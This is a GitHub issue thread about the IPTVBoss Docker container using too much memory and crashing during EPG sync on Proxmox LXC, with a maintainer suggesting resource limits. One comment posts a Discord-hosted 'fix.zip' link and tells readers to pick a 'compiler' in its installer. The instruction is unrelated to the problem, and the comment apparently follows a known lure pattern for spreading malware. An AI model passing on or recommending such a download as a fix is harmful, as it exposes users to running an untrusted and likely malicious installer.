### ISSUE TITLE
High Memory Usage and Crashing 

### ISSUE THREAD

**Issue by fst916** [groenator/iptvboss-docker#33]
I am currently running the IPTVBoss docker container on a LXC in Proxmox, when starting IPTVBoss gui through the vnc it starts to sync  the EPG and memory usage goes from 500mb to over 8gb, 100% cpu and crashes. I am not sure what is causing this and going through the logs nothing stands out.

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by groenator** [comment]
Hi, 
I don't personally use LXC nor Proxmox. Is there anyway you can set a limit on the CPU and memory for the container?
